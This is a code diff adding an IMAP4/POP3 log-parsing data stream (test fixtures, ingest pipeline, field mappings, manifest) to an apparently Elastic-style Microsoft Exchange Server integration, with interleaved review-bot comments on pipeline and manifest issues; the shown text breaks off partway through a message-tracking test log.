@@ -0,0 +1,52 @@ +{ + "events": [ + { + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.231Z,00000000000ABC12,2,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,163,10,34,pass,*****,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1995:SSL;ProxySuccess\"\";ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\"," + }, + { + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.435Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,,0,0,0,CloseSession,,," + }, + { + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.067Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,1,17,5,user,ccw.altitude,R=OK," + }, + { + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:19.847Z,00000000000ABC12,2,1.2.3.4:143,10.11.12.13:65468,example123,118,31,34,authenticate,PLAIN,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1993:SSL;ProxySuccess\"\";LiveIdAR=OK;ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\"," + }, + { + "log": { + "file": { + "path": "Imap4" + } + }, + "message": 
"2024-01-24T15:30:18.896Z,00000000000ABC12,4,1.2.3.4:1993,10.11.12.13:25882,example123,15,18,262,examine,INBOX,\"R=OK;Rows=0;Recent=0;UidValidity=14;UidNext=2644;ActivityContextData=\"\"Dbl:ST.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:RPC.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0.7692308,I32:RPC.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,Dbl:STCPU.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=15,I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=266,I32:ROP.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=827177561,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,Dbl:EXR.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:BudgUse.T[]=15.0116996765137\"\";Budget=\"\"Owner:Sid~S-1-2-34-1234567890-1234567890-123456789-123456~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599988,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_0e36a769-e2a9-4d1d-98df-80be2753326c,IsServiceAccount:False,LiveTime:00:04:30.6615435\"\"\"," + }, + { + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:18.925Z,00000000000ABC12,5,1.2.3.4:1993,10.11.12.13:25882,example123,1,10,26,close,,\"R=OK;UidValidity=14;UidNext=2644;ActivityContextData=\"\"I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0\"\";Budget=\"\"Owner:Sid~S-1-2-34-5678910111-1213141516-171819202-212223~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599993,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_81f0fddf-6fcd-4e2e-9330-ca4a38f4057a,IsServiceAccount:False,LiveTime:00:04:30.6905655\"\"\"," + } + ] +} 
diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json-expected.json b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json-expected.json
new file mode 100644
index 00000000000..85dbc75a6a1
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json-expected.json
@@ -0,0 +1,210 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-24T15:31:51.231Z", + "event": { + "ingested": "2024-03-06T14:49:25.165868250Z", + "original": "2024-01-24T15:31:51.231Z,00000000000ABC12,2,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,163,10,34,pass,*****,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1995:SSL;ProxySuccess\"\";ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\"," + }, + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.231Z,00000000000ABC12,2,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,163,10,34,pass,*****,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1995:SSL;ProxySuccess\"\";ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\",", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:12345", + "command": "pass", + "context": "R=OK;Msg=\"Proxy:Host123.domain.tld:1995:SSL;ProxySuccess\";ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078", + "duration": 163, + "logtype": "pop3", + "parameters": "*****", + "rpsize": 34, + "rqsize": 10, + "seqnumber": 2, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:110", + "user": "ccw.altitude" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:31:51.435Z", + "event": { + "ingested": "2024-03-06T14:49:25.165884866Z", + "original": "2024-01-24T15:31:51.435Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,,0,0,0,CloseSession,,," + }, + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.435Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,,0,0,0,CloseSession,,,", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:12345", + "command": "CloseSession", + "duration": 0, + "logtype": "pop3", + "rpsize": 0, + "rqsize": 0, + "seqnumber": 1, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:110" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:31:51.067Z", + "event": { 
+ "ingested": "2024-03-06T14:49:25.165888148Z", + "original": "2024-01-24T15:31:51.067Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,1,17,5,user,ccw.altitude,R=OK," + }, + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.067Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,1,17,5,user,ccw.altitude,R=OK,", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:12345", + "command": "user", + "context": "R=OK", + "duration": 1, + "logtype": "pop3", + "parameters": "ccw.altitude", + "rpsize": 5, + "rqsize": 17, + "seqnumber": 1, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:110", + "user": "ccw.altitude" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:30:19.847Z", + "event": { + "ingested": "2024-03-06T14:49:25.165893874Z", + "original": "2024-01-24T15:30:19.847Z,00000000000ABC12,2,1.2.3.4:143,10.11.12.13:65468,example123,118,31,34,authenticate,PLAIN,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1993:SSL;ProxySuccess\"\";LiveIdAR=OK;ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\"," + }, + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:19.847Z,00000000000ABC12,2,1.2.3.4:143,10.11.12.13:65468,example123,118,31,34,authenticate,PLAIN,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1993:SSL;ProxySuccess\"\";LiveIdAR=OK;ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\",", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:65468", + "command": "authenticate", + "context": "R=OK;Msg=\"Proxy:Host123.domain.tld:1993:SSL;ProxySuccess\";LiveIdAR=OK;ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078", + "duration": 118, + "logtype": "imap4", + "parameters": "PLAIN", + "rpsize": 34, + "rqsize": 31, + "seqnumber": 2, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:143", + "user": "example123" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + 
"preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:30:18.896Z", + "event": { + "ingested": "2024-03-06T14:49:25.165896724Z", + "original": "2024-01-24T15:30:18.896Z,00000000000ABC12,4,1.2.3.4:1993,10.11.12.13:25882,example123,15,18,262,examine,INBOX,\"R=OK;Rows=0;Recent=0;UidValidity=14;UidNext=2644;ActivityContextData=\"\"Dbl:ST.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:RPC.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0.7692308,I32:RPC.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,Dbl:STCPU.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=15,I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=266,I32:ROP.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=827177561,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,Dbl:EXR.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:BudgUse.T[]=15.0116996765137\"\";Budget=\"\"Owner:Sid~S-1-2-34-1234567890-1234567890-123456789-123456~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599988,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_0e36a769-e2a9-4d1d-98df-80be2753326c,IsServiceAccount:False,LiveTime:00:04:30.6615435\"\"\"," + }, + "log": { + "file": { + "path": "Imap4" + } + }, + "message": 
"2024-01-24T15:30:18.896Z,00000000000ABC12,4,1.2.3.4:1993,10.11.12.13:25882,example123,15,18,262,examine,INBOX,\"R=OK;Rows=0;Recent=0;UidValidity=14;UidNext=2644;ActivityContextData=\"\"Dbl:ST.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:RPC.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0.7692308,I32:RPC.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,Dbl:STCPU.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=15,I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=266,I32:ROP.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=827177561,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,Dbl:EXR.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:BudgUse.T[]=15.0116996765137\"\";Budget=\"\"Owner:Sid~S-1-2-34-1234567890-1234567890-123456789-123456~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599988,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_0e36a769-e2a9-4d1d-98df-80be2753326c,IsServiceAccount:False,LiveTime:00:04:30.6615435\"\"\",", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:25882", + "command": "examine", + "context": 
"R=OK;Rows=0;Recent=0;UidValidity=14;UidNext=2644;ActivityContextData=\"Dbl:ST.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:RPC.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0.7692308,I32:RPC.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,Dbl:STCPU.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=15,I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=266,I32:ROP.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=827177561,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,Dbl:EXR.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:BudgUse.T[]=15.0116996765137\";Budget=\"Owner:Sid~S-1-2-34-1234567890-1234567890-123456789-123456~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599988,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_0e36a769-e2a9-4d1d-98df-80be2753326c,IsServiceAccount:False,LiveTime:00:04:30.6615435\"", + "duration": 15, + "logtype": "imap4", + "parameters": "INBOX", + "rpsize": 262, + "rqsize": 18, + "seqnumber": 4, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:1993", + "user": "example123" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:30:18.925Z", + "event": { + "ingested": "2024-03-06T14:49:25.165899267Z", + "original": 
"2024-01-24T15:30:18.925Z,00000000000ABC12,5,1.2.3.4:1993,10.11.12.13:25882,example123,1,10,26,close,,\"R=OK;UidValidity=14;UidNext=2644;ActivityContextData=\"\"I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0\"\";Budget=\"\"Owner:Sid~S-1-2-34-5678910111-1213141516-171819202-212223~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599993,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_81f0fddf-6fcd-4e2e-9330-ca4a38f4057a,IsServiceAccount:False,LiveTime:00:04:30.6905655\"\"\"," + }, + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:18.925Z,00000000000ABC12,5,1.2.3.4:1993,10.11.12.13:25882,example123,1,10,26,close,,\"R=OK;UidValidity=14;UidNext=2644;ActivityContextData=\"\"I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0\"\";Budget=\"\"Owner:Sid~S-1-2-34-5678910111-1213141516-171819202-212223~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599993,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_81f0fddf-6fcd-4e2e-9330-ca4a38f4057a,IsServiceAccount:False,LiveTime:00:04:30.6905655\"\"\",", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:25882", + "command": "close", + "context": 
"R=OK;UidValidity=14;UidNext=2644;ActivityContextData=\"I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0\";Budget=\"Owner:Sid~S-1-2-34-5678910111-1213141516-171819202-212223~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599993,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_81f0fddf-6fcd-4e2e-9330-ca4a38f4057a,IsServiceAccount:False,LiveTime:00:04:30.6905655\"",
+ "duration": 1,
+ "logtype": "imap4",
+ "rpsize": 26,
+ "rqsize": 10,
+ "seqnumber": 5,
+ "sessionid": "00000000000ABC12",
+ "sip": "1.2.3.4:1993",
+ "user": "example123"
+ }
+ },
+ "source": {
+ "ip": "10.11.12.13"
+ },
+ "tags": [
+ "preserve_original_event"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/agent/stream/filestream.yml.hbs b/packages/microsoft_exchange_server/data_stream/imap4_pop3/agent/stream/filestream.yml.hbs
new file mode 100644
index 00000000000..9c5a9235ed8
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/agent/stream/filestream.yml.hbs
@@ -0,0 +1,17 @@
+paths:
+{{#each paths as |path i|}}
+ - {{path}}
+{{/each}}
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag i|}}
+ - {{tag}}
+{{/each}}
+exclude_files: [".gz$"]
+processors:
+ - add_locale: ~
+{{#if processors}}
+{{processors}}
+{{/if}}
diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..45e168671e5
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/elasticsearch/ingest_pipeline/default.yml
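Review bot: The `{{#if preserve_original_event}}` branch in filestream.yml.hbs refers to a variable that the imap4_pop3 data stream manifest (packages/microsoft_exchange_server/data_stream/imap4_pop3/manifest.yml, below) does not declare among its stream vars, which only list `paths`, `tags` and `processors`; unless it is defined at package level, the condition is never true and the `preserve_original_event` tag can never reach the agent. Either add the usual bool var to the manifest, e.g. `- name: preserve_original_event` with `type: bool` and `default: false`, or drop the branch from the template so the behaviour matches what the UI exposes. The httpproxy manifest above omits the same var; whether its template carries the same condition is not visible in this chunk.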
@@ -0,0 +1,72 @@
+---
+description: Pipeline for processing sample logs
+processors:
+- drop:
+ if: "ctx.message =~ /^[^0-9]/ || ctx.message =~ /^#/"
+- set:
+ field: event.original
+ copy_from: message
+- csv:
+ field: event.original
+ ignore_failure: true
+ ignore_missing: true
+ target_fields:
+ - "@timestamp"
+ - microsoft.exchange.sessionid
+ - microsoft.exchange.seqnumber
+ - microsoft.exchange.sip
+ - microsoft.exchange.cip
+ - microsoft.exchange.user
+ - microsoft.exchange.duration
+ - microsoft.exchange.rqsize
+ - microsoft.exchange.rpsize
+ - microsoft.exchange.command
+ - microsoft.exchange.parameters
+ - microsoft.exchange.context
+ - microsoft.exchange.puid
+- grok:
+ field: microsoft.exchange.cip
+ patterns:
+ - "%{NOTSPACE:source.ip}:%{NUMBER}"
+ ignore_missing: true
+ if: ctx.microsoft?.exchange?.cip != null
+ ignore_failure: true
+- set:
+ field: microsoft.exchange.logtype
+ if: ctx.log?.file?.path =~ /Imap4/
+ value: imap4
+ ignore_empty_value: true
+ ignore_failure: true
+- set:
+ field: microsoft.exchange.logtype
+ if: ctx.log?.file?.path =~ /Pop3/
+ value: pop3
+ ignore_empty_value: true
+ ignore_failure: true
+- convert:
+ field: microsoft.exchange.duration
+ type: long
+ ignore_failure: true
+- convert:
+ field: microsoft.exchange.rpsize
+ type: long
+ ignore_failure: true
+- convert:
+ field: microsoft.exchange.rqsize
+ type: long
+ ignore_failure: true
+- convert:
+ field: microsoft.exchange.seqnumber
+ type: long
+ ignore_failure: true
+- set:
+ field: event.ingested
+ copy_from: _ingest.timestamp
+ ignore_failure: true
+on_failure:
+ - set:
+ field: event.kind
+ value: pipeline_error
+ - append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/base-fields.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
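Review bot: The imap4_pop3 pipeline keeps both `message` and `event.original` on every event: `event.original` is copied from `message` unconditionally near the top and never removed, so the `preserve_original_event` tag has no effect and each event stores the raw line twice (the expected-output file confirms both fields are present). The usual pattern is a trailing `remove` of `event.original` guarded by `if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))`, as in the fence below; the pipeline test config already sets that tag, so the expected files only need regenerating for the added `user.name`. The authenticating account in `microsoft.exchange.user` is never copied to ECS `user.name`, unlike the httpproxy data stream whose ecs.yml declares that field, which leaves POP3/IMAP4 logons (the `user`, `pass` and `authenticate` commands in the fixtures) invisible to detections keyed on `user.name`; the same gap applies to imap4_pop3/fields/ecs.yml further down, which would need `user.name` added. Two smaller points: the second half of the `drop` condition, `ctx.message =~ /^#/`, is already covered by `/^[^0-9]/`, and the grok pattern `%{NOTSPACE:source.ip}:%{NUMBER}` discards the port and accepts any non-space token as `source.ip`, so a non-IP value would fail against the `ip` mapping at index time rather than inside the pipeline; `%{IP:source.ip}:%{NUMBER:source.port:int}` is tighter (with `source.port` added to ecs.yml if adopted).

```yaml
# … unchanged: drop, set event.original, csv, grok, logtype, convert …
- set:
    field: user.name
    copy_from: microsoft.exchange.user
    ignore_empty_value: true
    ignore_failure: true
- remove:
    field: event.original
    if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
    ignore_failure: true
    ignore_missing: true
# … unchanged: set event.ingested, on_failure …
```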
+++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/ecs.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/ecs.yml
new file mode 100644
index 00000000000..e404a5c3aa5
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/ecs.yml
@@ -0,0 +1,8 @@
+- external: ecs
+ name: message
+- external: ecs
+ name: log.file.path
+- external: ecs
+ name: source.ip
+- external: ecs
+ name: tags
diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/fields.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/fields.yml
new file mode 100644
index 00000000000..f892677c4d6
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/fields.yml
@@ -0,0 +1,26 @@
+- name: microsoft.exchange.sessionid
+ type: keyword
+- name: microsoft.exchange.seqnumber
+ type: long
+- name: microsoft.exchange.sip
+ type: keyword
+- name: microsoft.exchange.cip
+ type: keyword
+- name: microsoft.exchange.user
+ type: keyword
+- name: microsoft.exchange.duration
+ type: long
+- name: microsoft.exchange.rqsize
+ type: long
+- name: microsoft.exchange.rpsize
+ type: long
+- name: microsoft.exchange.command
+ type: keyword
+- name: microsoft.exchange.parameters
+ type: keyword
+- name: microsoft.exchange.context
+ type: keyword
+- name: microsoft.exchange.puid
+ type: keyword
+- name: microsoft.exchange.logtype
+ type: keyword
diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/manifest.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/manifest.yml
new file mode 100644
index 00000000000..c0871a62ea3
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/manifest.yml
@@ -0,0 +1,30 @@
+title: "Exchange Server IMAP4 POP3"
+type: logs
+streams:
+ - input: filestream
+ title: Exchange Server IMAP4 POP3 Logs
+ description: Collect Exchange Server IMAP4 POP3 logs
+ vars:
+ - name: paths
+ type: text
+ title: Paths
+ multi: true
+ required: true
+ show_user: true
+ default:
+ - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\Imap4\\IMAP*.LOG"
+ - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\Pop3\\POP*.LOG"
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: false
+ show_user: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details.
diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-common-config.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..a06dda74051
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,5 @@
+dynamic_fields:
+ "event.ingested": ".*"
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log
new file mode 100644
index 00000000000..6a83935be5c
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log
@@ -0,0 +1,4 @@ +2024-01-25T15:16:09.843Z,,,,exchange-mail,No suitable shadow servers,,SMTP,HAREDIRECTFAIL,70971234566456,<20240124222112.B4AE1234EF@host01.my.domain.com>,2fd37dca-1234-5bfb-175d-08dc1db88f52,mailuser@my.domain.com,,15054,1,,,Undelivered Mail Returned to Sender,MAILER-DAEMON@host01.my.domain.com,root@host01.my.domain.com,,Incoming,,,,S:DeliveryPriority=Normal;S:OriginalFromAddress=root@host01.my.domain.com;S:AccountForest=my.domain.com,Email,dc69df25-1234-564c-41c4-08dc1db88f7f,15.02.0330.005 +2024-01-25T15:16:09.949Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE5;2024-01-25T15:16:09.544Z;0,exchange-mail\Default exchange-mail,SMTP,RECEIVE,70912345566403,<20240123200014.123F425E28@host01.my.domain.com>,1e6eb197-c6b4-1234-1b69-56dc1db88f50,mailuser@my.domain.com,,7229,1,,,vzdump backup status (host01.my.domain.com): backup successful,root@host01.my.domain.com,root@host01.my.domain.com,0cA: ,Incoming,,10.11.12.13,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.13;S:ProxiedClientHostname=host01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,05503123-c5b9-46fe-1234-56dc1db88f8f,15.02.0330.005 +2024-01-25T15:16:14.415Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE9;2024-01-25T15:16:12.885Z;0,exchange-mail\Default exchange-mail,SMTP,RECEIVE,70912345566407,<20240123200018.123C42553@pve-vhost01.my.domain.com>,c95b5dd1-f520-1234-e6dc-56dc1db8914d,mailuser@my.domain.com,,8251,1,,,vzdump backup status (pve-vhost01.my.domain.com): backup successful,root@pve-vhost01.my.domain.com,root@pve-vhost01.my.domain.com,0cA: 
,Incoming,,10.11.12.15,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.15;S:ProxiedClientHostname=pve-vhost01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,d6aef52d-0e05-1234-e29b-56dc1db89238,15.02.0330.005 +2024-01-07T00:00:07.463Z,192.168.0.1,exchange,192.168.0.2,exchange.example.com,;250 2.0.0OK20240107001234.567E6224C8@monitor.example.com[Hostname=exchange.example.com];ClientSubmitTime:,Intra-Organization SMTP Send Connector,SMTP,SEND,29519319995411,20240107001234.567E6224C8@monitor.example.com,0b7099ea-cb95-1234-328e-08dc5f139ac8,uwe.musterman@example.com,250 2.1.5Recipient OK,38663,1,,,ein Titel,support@example.com,support@example.com,2024-01-07T00:00:05.535Z;LSRV=exchange.example.com:TOTAL-HUB=1.921|SMR=0.127(SMRDE=0.002|SMRC=0.125(SMRCL=0.105|X-SMRCR=0.125))|CAT=1.698(CATOS=0.018(CATSM=0.017(CATSM-Malware Agent=0.017))|CATRESL=0.004|CATORES=1.567(CATRS=1.566(CATRS-ScanMail Routing Agent=0.117|CATRS-Transport Rule Agent=0.002(X-ETREX=0.002)|CATRS-Index Routing Agent=1.444))|CATORT=0.108(CATRT=0.107(CATRT-Journal 